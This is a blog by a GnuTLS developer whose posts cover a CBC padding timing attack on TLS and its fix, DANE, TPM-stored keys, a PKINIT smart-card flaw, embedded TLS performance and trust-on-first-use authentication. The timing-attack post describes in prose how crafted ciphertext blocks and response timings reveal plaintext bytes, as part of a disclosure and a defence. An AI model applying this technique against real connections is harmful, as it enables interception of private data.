nmav's Blog

Tuesday, February 5, 2013

Time is money (in CBC ciphersuites)

While protocols are not always nicely written, deviating from them has a big disadvantage. You cannot blame someone else if there is a problem. It has a small advantage though, you avoid monoculture and an attack that is applicable to the protocol may not applicable to you. What happened in the following story is something in between.

But let's start from the beginning. Few months ago I received a paper from Nadhem Alfardan and Kenny Paterson about a new timing attack on TLS CBC ciphersuites. That paper got on my low priority queue since I'm not that impressed by timing attacks. They are nicely done on the lab, but fall short in the field. Nevertheless at some point this attack got my attention because it claimed it could recover few bits of the plaintext when using GnuTLS over ethernet.

Let's see what is the actual scenario though. In order for the attack to work the client must operate as follows. It connects to a server, it sends some data (which will be encrypted), the attacker will intercept them, and terminate the client's connection abnormally. The client will then reconnect and resend the same data, again and again.

That is not the typical scenario of TLS, but it is not so unrealistic either (think of a script that does that). The main idea of the attack is that the described attacker can distinguish between different padding values of TLS messages using the available timing information between receipt of a message and server reply (which may just be the TCP tear down messages).

How is that done with GnuTLS? The attacker takes the input ciphertext and forms a message of 20 AES blocks. Then takes the part of the message he's interested at and copies the matching block and its predecessor as the last two encrypted blocks (which contain the MAC and padding).

Then on every different user connection it XORs the last byte of the penultimate block with a byte (say Delta to be consistent with the paper) of his choice. On every client reconnection he repeats that using a different Delta and waits for the server response (a TLS server notifies the client of decryption failure).

In the paper they plot a diagram that shows that certain values of Delta require different time to receive a reply. I re-implemented the attack for verification, and the measurements on the server can be seen in the following diagram. Note that the last plaintext byte is zero (also note that some attack results in the paper are due to a bug the authors discovered which is now fixed, the discussion here refers to the fixed version of GnuTLS).

Figure 1. Median server timings for AES-CBC-SHA1, for a varying Delta, on GnuTLS 3.1.6 or earlier (view on the server)

It is clear that different values of Delta cause different response time. What we see in these timing results is the differences due to the sizes of the data being applied to the hash algorithm. In GnuTLS the bigger the Delta, the larger the pad (remember that the last byte of plaintext was zero), and less time is spent in hashing data.

The small increase in processing time seen on every block, is the correctness check of the pad (which takes more time as the pad increases). In that particular CPU I used, the differences per block seem to be around 200 nanoseconds, and the difference between the slower and the fastest block is around 1 microsecond.

The question is, can an attacker notice such small differences over ethernet? In the paper the authors claim yes (and present some nice figures). I repeated the test, not over the ethernet, but over unix domain sockets, i.e., only delays due to kernel processing are added. Let's see the result.

Figure 2. Median server timings for AES-CBC-SHA1, for a varying Delta, on GnuTLS 3.1.6 or earlier (attacker view)

Although it is more noisy the pattern is still visible. Could we avoid that pattern from being visible? Let's first follow the RFC padding removal precisely and check again.

Figure 1. Median server timings for AES-CBC-SHA1, for a varying Delta, on GnuTLS 3.1.6 with TLS conformant padding check applied (view on the server)

That's much better. Obvious patterns disappeared. However, there is no happy end yet. In the same paper the authors present another attack on OpenSSL which uses the above padding method. Surprisingly that attack can recover more data than before (but at a slower pace). That's the Full Plaintext recovery attack on the paper and it uses the fact that TLS 1.2 suggests to assume 0 bytes of padding. Zero bytes of padding is an invalid value (padding in TLS is from 1 to 256 bytes) and thus cannot be set by a legitimate message.

This can be exploited and then invalid padding can be distinguished from valid padding, by selecting message size in a way that if 0 is used as pad, the additional byte that will be hashed will result to a full block processed by the hash algorithm. That is we would expect that if a correct pad is guessed less processing would occur. Let's visualize it on an example.

Figure 4. Median server timings for AES-CBC-SHA1, for a varying Delta, on a TLS compliant implementation

Notice at the lonely point on the bottom left. We can see that when Delta is zero the processing is 200ms faster. For the selected message, the zero Delta resulted to a correct pad. How to fix that? That is pretty tricky.

In order to fix this pattern the code that is doing the CBC pad removal has to be aware of the internal block sizes in the hash, as well as any internal padding used by the hash. In a typical layered implementation (or at least in GnuTLS) that isn't easy. The internal hash block size wasn't available, because one shouldn't need to know that. The paper suggests a fix, that assumes a block size of 64, which is correct for all the HMAC algorithms in TLS, but that isn't future proof (e.g. SHA3 hasn't got the same block size).

So what to do there? The fix for GnuTLS is now similar to the hack described in the paper. The hash block size and knowledge of the internal padding are taken into account to achieve a pretty uniform processing time (see below). Any differences are now into the level of 10's of nanoseconds.

Figure 4. Median server timings for AES-CBC-SHA1, for a varying Delta, after work-around is applied

Now we're very close to a happy end. What is important though, is to prevent a similar attack from occurring next year. This isn't a new attack, even the TLS 1.1 protocol acknowledges that timing channel, but does nothing to solve it. TLS implementations now need to have 2-3 pages of code just to remove the CBC padding, and that makes clear that the TLS spec is broken and needs to be updated.

Together with Alfredo Pironti we ~~plan to propose~~ proposed a new padding mechanism which one of its targets is to eliminate that CBC padding issue (the other target is to allow arbitrary padding to any ciphersuite). The way the timing channels in CBC padding are eliminated, is by considering pad as part of the transferred data (i.e., it is properly authenticated). As such the pad check code does not provide any side-channel information because it operates only after the MAC is verified.

PS. Kudos go to Oscar Reparaz for long discussions on side channel attacks.

PS2. I should note that Nadhem and Kenny were very kind to notify me of the bugs and the attack. While this may seem like the obvious thing to do, it is not that common with other academic authors (I'm very tempted to place a link here).

Monday, October 8, 2012

Some thoughts on the DANE protocol

A while ago I was writing on why we need an alternative authentication method in TLS. Then I described the SSH-style authentication and how it was implemented it GnuTLS. Another approach is the DANE protocol. It uses the hierarchic model of DNSSEC to provide an alternative authentication method in TLS.

DNSSEC uses a hierarchical model similar to a single root CA that is delegating CA responsibilities to each individual domain holder for its domain. In DANE a DNSSEC-enabled domain may sign entries for each TLS server in the domain. The entries contain information, such as the hash, of the TLS server's certificate. That's a nice idea and can be used instead, or in addition to the existing commercial CA verification. Let's see two examples that demonstrate DANE. Let's suppose we have an HTTPS server called www.example.com and a CA.

A typical web client after it successfully verifies www.example.com's certificate using the CA's certificate, will check the DANE entries. If they match it's assured that a CA compromise does not affect its current connection. That is, in this scenario, an attacker needs not only to compromise the example.com's CA, but also to compromise the server's DNS domain service.

Another significant example is when there is no CA at all. The server www.example.com is a low-budget one and wants to avoid paying any commercial CA. If it has DNSSEC set up then it just advertises its key on the DNS and clients can verify its certificate using the DNSSEC signature. That is the trust is moved from the commercial CAs to the DNS administrators. Whether they can cope with that, will be seen in time.

Even though the whole idea is attractive, the actual protocol is (IMO) quite bloated. On a recent post in the DANE mailing list I summarized several issues (note that I was wrong on the first). The most important I believe is the fact that DANE separates the certificates to CA signed certificates and to self-signed certificates. That is if you have a CA signed certificate you mark it in the DNS entry as 1, while if you have a self signed one you mark it as 3. The reasoning behind this is unclear but it's effect is that it is harder to move from the CA signed to non-CA signed world or vice-versa. That is if you have a CA signed certificate and it expires, the DANE entry automatically becomes invalid as well. This may be considered a good property for some (especially the CAs), but I see no much point in that. It is also impossible for the server administrator to know whether a client trusts its CA, thus this certificate distinction doesn't always make sense. A work-around is to always have your certificates marked as self-signed and CA signed in two different DNS entries.

Despite this and few other shortcomings that I worry of, this is the best protocol we have so far to divide the trust for TLS certificates verification to more entities than the commercial CAs. For this reason, a companion library implementing DANE will be included in the upcoming GnuTLS 3.1.3 release.

Thursday, August 16, 2012

Using the Trusted Platform Module to protect your keys

There was a big hype when the Trusted Platform Module (TPM) was introduced into computers. Briefly it is a co-processor in your PC that allows it to perform calculations independently of the main processor. This has good and bad side-effects. In this post we focus on the good ones, which are the fact that you can use it to perform cryptographic operations the same way as in a smart-card. What does that mean? It simply means that you can have RSA keys in your TPM chip that you can use them to sign and/or decrypt but you cannot extract them. That way a compromised web server doesn't necessarily mean a compromised private key.

GnuTLS 3.1.0 (when compiled with libtrousers) adds support for keys stored in the TPM chip. This support is transparent, and such keys can be used similarly to keys stored in files. What is required is that TPM keys are specified using a URI of the following forms.

tpmkey:uuid=c0208efa-8fe3-431a-9e0b-b8923bb0cdc4;storage=system
tpmkey:file=/path/to/the/tpmkey

The first URI contains a UUID which is an identifier of the key, and the storage area of the chip (TPM allows for system and user keys). The latter URI is used for TPM keys that are stored outside the TPM storage area, i.e., in an (encrypted by the TPM) file.

Let's see how we can generate a TPM key, and use it for TLS authentication. We'll need to generate a key and the corresponding certificate. The following command generates a key which will be stored in the TPM's user section.

$ tpmtool --generate-rsa --bits 2048 --register --user

The output of the command is the key ID.

tpmkey:uuid=58ad734b-bde6-45c7-89d8-756a55ad1891;storage=user

So now that we have the ID of the key, let's extract the public key from it.

$ tpmtool --pubkey "tpmkey:uuid=58ad734b-bde6-45c7-89d8-756a55ad1891;storage=user" --outfile=pubkey.pem

And given the public key we can easily generate a certificate using the following command.

$ certtool --generate-certificate --outfile cert.pem --load-privkey "tpmkey:uuid=58ad734b-bde6-45c7-89d8-756a55ad1891;storage=user" --load-pubkey pubkey.pem --load-ca-certificate ca-cert.pem --load-ca-privkey ca-key.pem

The generated certificate can now be used with any program using the gnutls library, such as gnutls-cli to connect to a server. For example:

$ gnutls-cli --x509keyfile "tpmkey:uuid=58ad734b-bde6-45c7-89d8-756a55ad1891;storage=user" --x509certfile cert.pem -p 443 my_host.name

An easy to notice issue with TPM keys is that they are not mnemonic. There is only an UUID identifying the key, but no labels making the distinction of multiple keys a troublesome task. Nevertheless, TPM keys provide a cheap way to protect keys used in your system.

Wednesday, April 18, 2012

A flaw in the smart card Kerberos (PKINIT) protocol

Reading security protocols is not always fun nor easy. Protocols like public key Kerberos are hard to read because they just define the packet format and expect the reader to assume a correct message sequence. I read it, nevertheless, because I was interested on the protocol's interaction with smart cards. If you are not aware of the protocol, public key Kerberos or PKINIT is the protocol used in Microsoft Active Directory and described in RFC4556.

The idea of the protocol is to extend the traditional Kerberos, that supports only symmetric ciphers, with digital signatures and public key encryption in order to support stock smart cards. A use-case is, for example, logging in a windows domain using the smart card. The protocol itself doesn't mention smart cards at all, probably because it was thought as a deployment issue. Nevertheless, it was believed to be a secure protocol and several published papers provided proofs of security for all operational modes of the protocol.

However, the protocol has an important flaw. A flaw that makes it insecure if used with smart cards. I wrote a detailed report on the flaw, but the main idea is that if one has access for few minutes to your smart card he can login using your credentials at any time in the future. You may think that an attack like that can be prevented by never lending your smart card to anyone, but how can you prove that no-one borrowed it for a while? Or if you believe the smart card PIN would protect from theft, how could you know that the reader you are inserting your card isn't tampered? And in a protocol with smart cards you'd expect the tampered reader not to be able to use the card after you retrieve it. This is not the case, making the protocol unsuitable for smart cards, its primary use-case.

What is the most interesting issue however, are the security proofs. The protocol was proven secure, but because the protocol never mentioned smart cards, researchers proved its security on a different setting than the actual use cases. So when reading a security proof, always check the assumptions, which are as important as the proof itself.

Few things went bad with the design of this protocol, none of which is actually technical. The protocol is hard to read, and in order to get an overview of it, you have to read the whole RFC. This is just bad. If you check figure 1 in the TLS RFC you get an overview of the protocol immediately. You might not know the actual contents of the messages but the sequence is apparent. This is not possible in the Kerberos protocol, and that discourages anyone who might want to understand the protocol using a high level description of it. Another flaw, is that the protocol doesn't mention smart cards, its primary use-case. Smart cards were treated as a deployment issue and readers of the RFC, would never know about it. The latter issue is occurring in many of the IETF protocols and the readers are expected to know where and how this protocol is used. As it was demonstrated by the security proofs on a different setting, this is not the case.

So, what can it be done to mitigate the flaw? Unfortunately without modifying the protocol, the only advice that can be given is something along the:

make sure you always possess the card;
make sure you never use a tampered smart card reader.

Which may seem pretty useless in a typical working environment. What makes the attack nasty, is that if an adversary tampers your reader, and you use your card with it now, the adversary can perform a transaction a year later when you'll have no clue on what happened and might be no evidence of the tampered reader.

Sunday, April 1, 2012

TLS in embedded systems

In some embedded systems space may often be a serious constraint. However, there are many such systems that contain several megabytes of flash either as an SD memory card, or as raw NAND, having no real space constraint. For those systems using a TLS implementation such as GnuTLS or OpenSSL would provide performance gains that are not possible with the smaller implementations that target small size. That is because both of the above implementations, unlike the constraint ones, support cryptodev-linux to take advantage of cryptographic accelerators, widely present in several constraint CPUs, and support elliptic curves to optimize performance when perfect forward secrecy is required.

I happened to have an old geode (x86 compatible) CPU which contained an AES accelerator, so here are some benchmarks created using the nxweb/GnuTLS and nginx/OpenSSL web servers and the httpress utility. The figure on the right shows the data transferred per second using AES in CBC mode, with the cryptographic accelerator compared to GnuTLS' and OpenSSL's software implementations. We can clearly see that download speed almost doubles on a big file transfer when using the accelerator.

The figure on the left shows a comparison of the various key exchange methods in this platform using GnuTLS and OpenSSL. The benchmark measures HTTPS transactions per second and the keys and parameters used are the same for both implementations. The key sizes are selected of equivalent security levels (1776 bits in RSA and DH are equivalent to 192 bits in ECDH according to ECRYPT II recommendations). We can see that the elliptic curve version of Diffie Hellman (ECDHE-RSA) allows 25% more transactions in both implementations comparing to the Diffie-Hellman on a prime field (DHE-RSA). The plain RSA key exchange remains the fastest, at the cost of sacrificing perfect forward secrecy.

As a side-note it is nice to see that at the security level of 192 bits GnuTLS outperforms OpenSSL on this processor. The trend continues on higher security levels for the RSA and DHE-RSA methods but the ECDHE-RSA method is interesting since even though OpenSSL has a more efficient elliptic curve implementation. GnuTLS' usage of nettle and GMP (which provide a faster RSA implementation) compensates, and their performance is almost identical.

Overall, in the few embedded systems that I've worked on, space was not a crucial limiting factor, and it was mainly this work that drove me into updating cryptodev for linux. In those systems the space cost occurred due to the usage of a larger library was compensated by (1) the off-loading to the crypto processor of operations that would otherwise load the CPU and (2) the reduce in processing time due to elliptic curves.
However this balance is system specific and what was important for my needs would not cover everyone elses, so it is important to weigh the advantages and disadvantages of cryptographic implementations on your system alone.

Sunday, March 18, 2012

Google summer of code

This year GnuTLS participates in the Google summer of code under the GNU project umbrella. If you are a student willing to spend this summer coding, check our ideas.

Saturday, February 18, 2012

The need for SSH-like authentication in TLS

After the Diginotar CA compromise it is apparent that verifying web sites using only a trusted certificate authority (CA) is not sufficient. Currently a web site's certificate is verified against the CA that issued it and checked for revocation using the OCSP server the CA set up. If the CA is trusted by the user, this process protects against man-in-the-middle attacks when visiting such a web-site, and also against leakage of the web-sites private key (e.g. via OCSP as long as the leakage is reported to the CA). This is an automatic process that does not require the user to be involved, but it comes at a cost. There is a single channel for verification, the CA.

The certificate based web-site verification tries to convert the trust we have in a merchant to the digital world. That is currently done by having "few" authorities that provide certificates to the merchants and based on those certificates we should base our decisions. However, trust in trade requires more than that. For example wouldn't it raise suspicions, a laptop from a merchant who approached you in a parking lot and provided you with a legitimate looking brand card? Would his business or credentials card be the only thing to check? Those heuristics are unfortunately not currently available in the digital world.

If it wasn't for the Chrome browser that implemented a preliminary version of key pinning, the Diginotar compromise might not have been uncovered. In the maliciously-issued certificates, the automatic verification procedure was not reporting any problems. It was the change in public key that triggered the key pinning warning and eventually to the Diginotar issue becoming public. Thus having an additional verification channel to standard PKI proved to be a success.

Key pinning, as of the 01 draft, is mostly server driven. That is, the user has very little control on trusting a particular server key if the server operator doesn't ask to. Another approach is the SSH programs' typical authentication method. The trust on first use. That describes the concept where the public key of the peer is not verified, or verified out-of-bound, but subsequent connections to the same peer require the public key to remain the same. That approach has the advantage that doesn't depend on the server operator setting up anything, but also the disadvantage that the user will be bugged every time the server changes its public key.

In any case having such methods to complement standard certificate verification and revocation checks, provides an additional layer of security. With such a layer, a CA compromise would not be enough for a large-scale man-in-the-middle attack since changes in the public keys would be detected and users would be warned. Such warnings might not be entirely successful in preventing all users from continuing but would raise suspicions for the legitimacy of the server, which might be enough.

For that, we implemented in GnuTLS a framework to be used either by applications that want to use key pinning, or a trust on first use (TOFU) authentication. That consists of three helper functions that store and verify the public keys. They can be seen in the GnuTLS manual. The included program gnutls-cli has also been modified to support a hybrid authentication that includes certificate authentication, TOFU and OCSP if the --tofu and --ocsp arguments are specified. The main idea of its operation is the idea discussed here and is shown in this example code at the manual.